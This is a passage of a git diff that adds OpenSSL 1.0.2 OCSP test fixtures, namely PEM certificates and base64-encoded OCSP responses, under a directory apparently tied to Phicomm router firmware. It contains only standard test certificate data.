+HWLrp+cxEmbDD6ZLLkGC9/3JG6gbr+48zuOcrigHoSybJMIPIyaDMouGDx8rEkYl
+Fo92kANr3ryqImhrjKGsKxE5pttwwn1y6TPn/CbxdFqR5p2ErPioBhlG5qfpqjQi
+pKGfeq23sqSaM4hxAjwu1nqyH6LKwN0vEJT9s4yEIHlG1QXUEOTS22RPuFvuG8Ug
+R1uUq27UlTMdphVx8fiUylQ5PsI=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND3_Issuer_Root.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND3_Issuer_Root.pem
new file mode 100644
index 0000000..4904a32
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISIC_ND3_Issuer_Root.pem
@@ -0,0 +1,25 @@
+-----BEGIN CERTIFICATE-----
+MIIENjCCAx6gAwIBAgIBATANBgkqhkiG9w0BAQUFADBvMQswCQYDVQQGEwJTRTEU
+MBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFkZFRydXN0IEV4dGVybmFs
+IFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290
+MB4XDTAwMDUzMDEwNDgzOFoXDTIwMDUzMDEwNDgzOFowbzELMAkGA1UEBhMCU0Ux
+FDASBgNVBAoTC0FkZFRydXN0IEFCMSYwJAYDVQQLEx1BZGRUcnVzdCBFeHRlcm5h
+bCBUVFAgTmV0d29yazEiMCAGA1UEAxMZQWRkVHJ1c3QgRXh0ZXJuYWwgQ0EgUm9v
+dDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALf3GjPm8gAELTngTlvt
+H7xsD821+iO2zt6bETOXpClMfZOfvUq8k+0DGuOPz+VtUFrWlymUWoCwSXrbLpX9
+uMq/NzgtHj6RQa1wVsfwTz/oMp50ysiQVOnGXw94nZpAPA6sYapeFI+eh6FqUNzX
+mk6vBbOmcZSccbNQYArHE504B4YCqOmoaSYYkKtMsE8jqzpPhNjfzp/haW+710LX
+a0Tkx63ubUFfclpxCDezeWWkWaCUN/cALw3CknLa0Dhy2xSoRcRdKn23tNbE7qzN
+E0S3ySvdQwAl+mG5aWpYIxG3pzOPVnVZ9c0p10a3CitlttNCbxWyuHv77+ldU9U0
+WicCAwEAAaOB3DCB2TAdBgNVHQ4EFgQUrb2YejS0Jvf6xCZU7wO94CTLVBowCwYD
+VR0PBAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wgZkGA1UdIwSBkTCBjoAUrb2YejS0
+Jvf6xCZU7wO94CTLVBqhc6RxMG8xCzAJBgNVBAYTAlNFMRQwEgYDVQQKEwtBZGRU
+cnVzdCBBQjEmMCQGA1UECxMdQWRkVHJ1c3QgRXh0ZXJuYWwgVFRQIE5ldHdvcmsx
+IjAgBgNVBAMTGUFkZFRydXN0IEV4dGVybmFsIENBIFJvb3SCAQEwDQYJKoZIhvcN
+AQEFBQADggEBALCb4IUlwtYj4g+WBpKdQZic2YR5gdkeWxQHIzZlj7DYd7usQWxH
+YINRsPkyPef89iYTx4AWpb9a/IfPeHmJIZriTAcKhjW88t5RxNKWt9x+Tu5w/Rw5
+6wwCURQtjr0W4MHfRnXnJK3s9EK0hZNwEGe6nQY1ShjTK3rMUUKhemPR5ruhxSvC
+Nr4TDea9Y355e6cJDUCrat2PisP29owaQgVR1EX1n6diIWgVIEM8med8vSTYqZEX
+c4g/VhsxOBi0cQ+azcgOno4uG+GMmIPLHzHxREzGBHNJdmAPx/i9F4BrLunMTA5a
+mnkPIAou1Z5jJh5VkpTYghdae9C8x49OhgU=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D1.ors
new file mode 100644
index 0000000..d28c9ec
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBSpTXftIZX0
+lLT9zwVSQC5Jfp3pqhgPMjAxMjEwMTAxMTU1NDVaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDEwMTAwMDAwWqARGA8yMDEyMTAxNzEw
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQCaiUf6TuPaSmZR2i3hUwqdEfhjcZkcCXPu
+9diWuDZbaL6ubthfeTwx6OsZ0eM3Q+WPhBNlYQ9Sm8PDUQsQiq3YvuYu+QUisChx
+PN6BUEwFQZAGz+FX2h5+kAmK1M/xZeXMBCXJWJCClagiw5hOJfeV0ue7RUZRVuZv
+am0ZjyIeLsxsIrxghlcaJRosFmYNoM++euu5lvclutv1UQ5yyNxlYy0T/jA9gS07
+WJ/i38+zxnXTuAPOm67p5N1IkEAEg/7OPRIG17Ig1C38NctN74vAOdTU1d/ay05V
+Bz4ZiI9PffkUkPgW2QRQCEjv50i80wYkKH5pIbT/mTk4t53DUK1UoIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRIcYjwu4UNkR1VGrDbSdFei8wDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDAzMVoXDTEyMTIxOTA4NDAzMVowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDExFzAVBgNV
+BAUTDjIwMTIwOTE5MDkzOTAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAxkkb6QhDH3sEDj4zaysjVzYelq9lZ1cso4R2IyQxaoPaG6GkaCmHA4sz6KP+
+m3ADqplibEUBa/mzCxHW8/oy3NhGMFdbezduZrnRFLbzakOTeIo8VEIM3JPfgREv
+CX8nj6Xu7ERD6JO/ZQ9Xr7YVzKKN+3cVZlcMHoGBnOPcO2Sz0AcYyk5m5IsGBRoT
+T86j6Cr9PhOPTVwXL6Wxy1KVHsUZXUwnRacV0O4SHWQ4zM9Sablus9fTbh1CgIqW
+sKDyzVB4yECXkBVeUlA+cuCaRRVHRiR+jPDSgbU62nnNudEpGG7dyoop6IOvXv2O
+ydncWzaukxIVvQ/Ij85kHqs7HQIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFKlNd+0hlfSUtP3PBVJALkl+nemqMB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCe4rZg61Dmwygl/Uae
+BJZog64/FvuB1sfCqKLJTjKOfLcugSTX1TT7bLJbzXRGPQuorI3TIZEOwldIw01d
+DTLlsOCHrfHd+bpxgijxPkUuaA4NYnpvqTEMJqPKOC8QYfKupNjAPSuHvwqvqCfO
+RCe3jY6xQDO0WCTZ8/xMsOkw+J/YEYqALETf2Ug7k5eRL/TvfLd8Sgi7vPfmUeiW
+ptlsbhMOWQoQc+JA3vCI01rrjNq+0kIZ/r8nPGvablRr0Aakk6eDuS2dcReaPwuK
+0xE136pJYiXdQ3SA7uwmlorjxmejavyoPCr23TU74DQEt6hhc6uIcabsa4Y8KvJy
+RI4G
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D2.ors
new file mode 100644
index 0000000..b6c541d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D2.ors
@@ -0,0 +1,32 @@
+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
+EMiDRMkyfIIMI80VgRvvzCiOt0c=
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D3.ors
new file mode 100644
index 0000000..a8a2f91
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_D3.ors
@@ -0,0 +1,38 @@
+MIIG8AoBAKCCBukwggblBgkrBgEFBQcwAQEEggbWMIIG0jCB+aF+MHwxCzAJBgNV
+BAYTAkFVMQwwCgYDVQQIEwNOU1cxDzANBgNVBAcTBlN5ZG5leTEUMBIGA1UEChML
+Q0FjZXJ0IEluYy4xHjAcBgNVBAsTFVNlcnZlciBBZG1pbmlzdHJhdGlvbjEYMBYG
+A1UEAxMPb2NzcC5jYWNlcnQub3JnGA8yMDEyMTAxMDEzMjE1OVowZjBkMDwwCQYF
+Kw4DAhoFAAQUi6TJyxcpGUU+u45zCZG5JfKDImUEFBa1MhvUx/Pg5o7zvdKwOu6y
+ORjRAgMLs8aAABgPMjAxMjEwMTAxMzA1MjBaoBEYDzIwMTIxMDEyMTMyMTU5WjAN
+BgkqhkiG9w0BAQUFAAOCAQEAH1auyXFf1fOdfShSnAFkg5JsRUvajrilUioTkPIn
+IGYV//huaPNZwZGCC2haZIdUuKB6G2OCXeZVskBTXPjt8/6JmoHgsZeI3x5xKXxZ
+vddLC0PgYp0cA3FqjXR2UCpdBF+GK37rnfZsdW2vD9JaEBXxTV4+ICDAg15ZphJW
+lLGmdP3mQqPURIwamcYam8tntARimgEpA0KgfVue2A+izjcxC7qk9BQYG72Fh3hC
+ZFxi5u6xKNUQ2EBF9KXZyP9d2i/bYCZAUeUSRtir+fsOXHlihYRih9npKyAPwpHd
+NqhwK9NhKed8gmkX3cSaK0arBx7ev7avhM4Dqem+BzppjKCCBL4wggS6MIIEtjCC
+Ap6gAwIBAgIDCpvzMA0GCSqGSIb3DQEBBQUAMHkxEDAOBgNVBAoTB1Jvb3QgQ0Ex
+HjAcBgNVBAsTFWh0dHA6Ly93d3cuY2FjZXJ0Lm9yZzEiMCAGA1UEAxMZQ0EgQ2Vy
+dCBTaWduaW5nIEF1dGhvcml0eTEhMB8GCSqGSIb3DQEJARYSc3VwcG9ydEBjYWNl
+cnQub3JnMB4XDTExMDgyMzAwMDI1NloXDTEzMDgyMjAwMDI1NlowfDELMAkGA1UE
+BhMCQVUxDDAKBgNVBAgTA05TVzEPMA0GA1UEBxMGU3lkbmV5MRQwEgYDVQQKEwtD
+QWNlcnQgSW5jLjEeMBwGA1UECxMVU2VydmVyIEFkbWluaXN0cmF0aW9uMRgwFgYD
+VQQDEw9vY3NwLmNhY2VydC5vcmcwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
+AoIBAQCcxtRv5CPHw3BLdR/k/K72YsRgodbP+UdAONmvBvWzhwm6B8h6O+M64sFr
+2w6be7SYBECIyOQgNJ1flK4MoAWhdBA/H5NtxaDOKbAqA27tO9GaevcPp7c518O0
+3hVnlPLvsN1f48nY0jQOXUTfv5nYXmD0OSSK/V3IRo0KsWB6T9UnMGCeEwb4Oqqz
+uzM0b4SBflzMEony/m6Tg/qL7qs2TLZAqe77+BZaVdFkDUnaBN7RyMruXySxeXiz
+mogT3WhROeloMa/X+E01bWBYBEK7VZIY9pgBpXQ7vDbbIGgYuIXUi20wh03WMy16
+VDYdV0IUXHpidNUeK9W/BPP/7APBAgMBAAGjRDBCMAwGA1UdEwEB/wQCMAAwJwYD
+VR0lBCAwHgYIKwYBBQUHAwIGCCsGAQUFBwMBBggrBgEFBQcDCTAJBgNVHREEAjAA
+MA0GCSqGSIb3DQEBBQUAA4ICAQAoT6p5f3cGprAcgrnzdenfTmDe9LCW7k2VnazA
+MAzpsD6gXcSlo4+3hoHem/SpKRH2tqi34DmImCiv/S6fxsKM4Gfn5rlkAFviuTvS
+r5Zrwh4ZKSfaoWv4bmbzmcAxvuxdMWHf/5PbjegjzFTbBMekVPZY/abYtD6kdHQZ
+VNgzwZVfTBfYhfa+Rg72I2zjKpMsjxMqWfTmUzW6wfK6LFudZqu0U1NnJw+IlnVU
+6WtjL885ebQrmcRqWz3nMhVLIu5L3w/s+VTLvm7If6jcMDNUjz8s2BPcJeCXg3TE
+STsyl6tvk17RRz2+9JskxVOk11xIn96xR4FCERIid2ek9z1xi7oYOajQF50i/9Gj
+ReDEfRSyb4/LzoKDOY+h4Q6jryeHh7WIHFiK5qrBN2y8qOoRJ/OqQnqci/BJBNpe
+g9Q9PJRgGSzRndTXNHiYRbeLpq7eGo3sPqlR9qBQ3rd98XGOU0RCMnzjKhENC3qo
+5PkSF2xs8RmjWktFSTDwjYo0qf1teo7CGHjgaPjQ7JE8Q4ysFOQndSWmLpqwDcI9
+HfIvPwUIWArQrJRh9LCNSyvHVgLqY9kw8NW4TlMxV2WqaYCkiKi3XVRrSFR3ahS1
+VBvRZ8KpplrV7rhXjVSSqqfLk1sX3l72Ck2F9ON+qbNFmvhgNjSiBY9neMgo804a
+wG/pag==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND1.ors
new file mode 100644
index 0000000..b230622
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND1.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBSIRFH/UCpp
+Xi2I9CG62QzyzsvqfBgPMjAxMjEwMTAwODU0NDVaMHMwcTBJMAkGBSsOAwIaBQAE
+FEi2DTgjjfhFbk7lhD6jlBEYApefBBSIRFH/UCppXi2I9CG62QzyzsvqfAIQIuEz
+IiCgSN8psr+aMcKbB4AAGA8yMDEyMTAxMDA4NTQ0NVqgERgPMjAxMjEwMTQwODU0
+NDVaMA0GCSqGSIb3DQEBBQUAA4IBAQDHKDxWTbAHRXY7HapfhE99T+OSa/AfRYqX
+H9yIeMRa5VftXMyvBFuvVm/qLRwK6mxhkiVIvF/Pk5yxMjbm7xPO26D+WHOdQML4
++M4OX9BO76FjZRin5x+4b0Xo5SuSU1ulqfvSZnx+nG+hMbt/3Y7ODCEUWCYFoXNp
+U+TXTbv2mwJ9AL8Q/zjL4P8NJHzFJBKjEs+AAVRxTY/5RHHKU9dcm7ux/gsWoDUM
+w677Xxzn6icd8mqn72/HmzPnMrLHKKJFe2escbJn7JlV6qbZ9EWbrr+3OH0IJy5I
+E3LcPIsNZ//QEc6vS6J+j8ljV8Xne6rS1EmiOwV9NgubvYwDCm4R
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND2.ors
new file mode 100644
index 0000000..d14efb9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND2.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBQLWOWLxkwV
+N6RAqTCpIb5HNlpW/xgPMjAxMjEwMTAwMDI1NTdaMHMwcTBJMAkGBSsOAwIaBQAE
+FOy+ZAvtiWulchtVZmfKU1ZI9ewTBBQLWOWLxkwVN6RAqTCpIb5HNlpW/wIQEaO0
+0OyNt3+doM1dLVEvQoAAGA8yMDEyMTAxMDAwMjU1N1qgERgPMjAxMjEwMTQwMDI1
+NTdaMA0GCSqGSIb3DQEBBQUAA4IBAQCJRXcrz4wJe7bqWBHULu/QDXVz74OhSNlu
+swI0J4h+UmzJuW1GpdhTwJcTG3ARVwCLKz3evvpvHSumcsop0G3NolryNLP/oGD0
+Vf6PbLrJ8v+NxUNugPbtWM985Ti/B2a+XjbzYlH2vS3KOTL4X1zWSL07IQFNXc2h
+yHBscKpYgt0mZcFZFxN3NTCNpT6IjJzZzTG9xTYZ3hZdMQQ3DYO+/Hv4J+U1/Ybq
+CjuMWRak/0R/BiBDJdGhbThlvV7bNUxYY7DVaOiLER8ptpmhnzlB/vsTAxZqX48J
+mJdv2bxoTby98Pm/BMydEA9qcFqyP1XvqhzIY35ngoS/1XREyW7t
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND3.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND3.ors
new file mode 100644
index 0000000..3ee7158
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ISOP_ND3.ors
@@ -0,0 +1,10 @@
+MIIB1AoBAKCCAc0wggHJBgkrBgEFBQcwAQEEggG6MIIBtjCBn6IWBBStvZh6NLQm
+9/rEJlTvA73gJMtUGhgPMjAxMjEwMDkxNjAxNTNaMHQwcjBKMAkGBSsOAwIaBQAE
+FHyxZlScq9tE7mImFq30ZXv3etWUBBStvZh6NLQm9/rEJlTvA73gJMtUGgIRAKcN
+bJWejX5BTb8DmevkCauAABgPMjAxMjEwMDkxNjAxNTNaoBEYDzIwMTIxMDEzMTYw
+MTUzWjANBgkqhkiG9w0BAQUFAAOCAQEAFnJAzuT8P4KKyTI6sdj5HkQ352qEu5CN
+K9M2kU/eg9kPfwLv8z3yArobwgx+/IDRajbVAKrk8UPCGUqkDc0OiU5c0+jpn+nT
+20VVCtWsBSWDfzKqYln/NGrblhv+/iuFZJpyfud5nWguW5nogPC8IAfgt9FMDMl6
+wlQWLSWEkgAJWvhNR3nzgvyMnuDuMIVQgB9/+vAIxA7nlpEEh6KTswyGqE9+u1yC
+kvrz4PwKZQMT6r1eRCLs6NaagOZT84QHhZ6TAA+QHjfK406KL8F9mFgbGKbW+st2
+QHm+giUhrgZMv+1Yaxe34BjDS439LCPjdZ29On8FeZr3F55T+s3VzA==
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1.ors
new file mode 100644
index 0000000..7452741
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1.ors
@@ -0,0 +1,10 @@
+MIIB0woBAKCCAcwwggHIBgkrBgEFBQcwAQEEggG5MIIBtTCBnqIWBBSIRFH/UCpp
+Xi2I9CG62QzyzsvqfBgPMjAxMjEwMTEwODQxMTNaMHMwcTBJMAkGBSsOAwIaBQAE
+FEi2DTgjjfhFbk7lhD6jlBEYApefBBSIRFH/UCppXi2I9CG62QzyzsvqfAIQIuEz
+IiCgSN8psr+aMcKbB4AAGA8yMDEyMTAxMTA4NDExM1qgERgPMjAxMjEwMTUwODQx
+MTNaMA0GCSqGSIb3DQEBBQUAA4IBAQCNnhlBMxxh9z5AKfzAxiKs90CfxUsqfYfk
+8XlyF9VIfWRfEwzS6MF1pEzLnghRxTAmjrFgK+sxD9wk+S5Mdgw3nbED9DVFH2Hs
+RGKm/t9wkvrYOX6yRQqw6uRvU/5cibMjcyzKB/VQMwk4p4FwSUgBv88A5sTkKr2V
+eYdEm34hg2TZVkipPMBiyTyBLXs8D/9oALtnczg4xlTRSjDUvqoXL5haqY4QK2Pv
+mNwna6ACkwLmSuMe29UQ8IX2PUB4R5Etni5czyiKGxZLm+4NAhuEwWFNEzCyImPc
+087gHGU1zx+qVSlajqMJ/9ZXYjbt7WiWdhOTGEv4VMn8dHhRUs32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Cert_EE.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Cert_EE.pem
new file mode 100644
index 0000000..e646162
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Cert_EE.pem
@@ -0,0 +1,36 @@
+-----BEGIN CERTIFICATE-----
+MIIGTTCCBTWgAwIBAgIQIuEzIiCgSN8psr+aMcKbBzANBgkqhkiG9w0BAQUFADCB
+jjELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4G
+A1UEBxMHU2FsZm9yZDEaMBgGA1UEChMRQ09NT0RPIENBIExpbWl0ZWQxNDAyBgNV
+BAMTK0NPTU9ETyBFeHRlbmRlZCBWYWxpZGF0aW9uIFNlY3VyZSBTZXJ2ZXIgQ0Ew
+HhcNMTEwMzMxMDAwMDAwWhcNMTMwNjI3MjM1OTU5WjCCAT8xETAPBgNVBAUTCDA0
+MDU4NjkwMRMwEQYLKwYBBAGCNzwCAQMTAkdCMR0wGwYDVQQPExRQcml2YXRlIE9y
+Z2FuaXphdGlvbjELMAkGA1UEBhMCR0IxDzANBgNVBBETBk01IDNFUTEbMBkGA1UE
+CBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRYwFAYDVQQJ
+Ew1UcmFmZm9yZCBSb2FkMRYwFAYDVQQJEw1FeGNoYW5nZSBRdWF5MSUwIwYDVQQJ
+ExwzcmQgRmxvb3IsIDI2IE9mZmljZSBWaWxsYWdlMRowGAYDVQQKExFDT01PRE8g
+Q0EgTGltaXRlZDEaMBgGA1UECxMRQ29tb2RvIEVWIFNHQyBTU0wxGjAYBgNVBAMT
+EXNlY3VyZS5jb21vZG8uY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEA168izw0zK6cChTGFuAwNARwTu1Ky/z+dXHkSmB0tQrAk3bq7mnUPtmQ+td8r
+G2hlhQPd+YXQVYEW3RuopydmdB9wMlEGCCfU2ZqohsC9uut+HenCVbYvn4sSB0KJ
+VdOXLPCEnfdk/FmcNWcYv73HmoJXZjT0THNQmnfpo6mMGAOerenMgNuCpq1buZ8c
+fFUeUY18ZGLZKZyRNM6GPgVA37Dm8Ru+9Cf8/rm7NSIoVWH4BDztM3Y1BZvZ0d4G
+49jRA4MXbhsDEMYzaSCDmaRHSFhCtrGkN2S4A1ZxoSoxQVCLcnnInVd+J0X8J6pa
+Efio/aD6UQBQq29HyTsWVe6BewIDAQABo4IB8TCCAe0wHwYDVR0jBBgwFoAUiERR
+/1AqaV4tiPQhutkM8s7L6nwwHQYDVR0OBBYEFKvAXKp4bYRmxU4SlM8k8FbWiXiL
+MA4GA1UdDwEB/wQEAwIFoDAMBgNVHRMBAf8EAjAAMDQGA1UdJQQtMCsGCCsGAQUF
+BwMBBggrBgEFBQcDAgYKKwYBBAGCNwoDAwYJYIZIAYb4QgQBMEYGA1UdIAQ/MD0w
+OwYMKwYBBAGyMQECAQUBMCswKQYIKwYBBQUHAgEWHWh0dHBzOi8vc2VjdXJlLmNv
+bW9kby5jb20vQ1BTMFMGA1UdHwRMMEowSKBGoESGQmh0dHA6Ly9jcmwuY29tb2Rv
+Y2EuY29tL0NPTU9ET0V4dGVuZGVkVmFsaWRhdGlvblNlY3VyZVNlcnZlckNBLmNy
+bDCBhAYIKwYBBQUHAQEEeDB2ME4GCCsGAQUFBzAChkJodHRwOi8vY3J0LmNvbW9k
+b2NhLmNvbS9DT01PRE9FeHRlbmRlZFZhbGlkYXRpb25TZWN1cmVTZXJ2ZXJDQS5j
+cnQwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmNvbW9kb2NhLmNvbTAzBgNVHREE
+LDAqghFzZWN1cmUuY29tb2RvLmNvbYIVd3d3LnNlY3VyZS5jb21vZG8uY29tMA0G
+CSqGSIb3DQEBBQUAA4IBAQC9SoVG+B40khDWAzlz+G0WDBM3OuqK5n8vY/XxdPS5
+qyv6K05S4VRGR/6PQa1UVzMbnhfLh54OWrpnalRGabpTmKDu8Pa912pzDSzMxg4U
+Rff4/hVLd1n/58q+riLxdtkIigLUjtFfwUrE1H89QODOCb4nw7f9BQaDoug+ovM3
+KO9rxVZ/3TshaxW0mPVM/cMbX+6RrQ7+d1y5fdX/fksCZhOW+P25+FPlaorQEWNa
+s0UZNQ6qVuxB7CPmnLqmLBfAKTbeKcQFxx//0eyyZqCkzIvYUNjeRR0Q7DnxXq4C
+Pj1Y6VcPJDmZOeogte5/vNIdU8Wq55IJJ1G/uKXztwVT
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Issuer_ICA.pem
new file mode 100644
index 0000000..3260db3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/ND1_Issuer_ICA.pem
@@ -0,0 +1,29 @@
+-----BEGIN CERTIFICATE-----
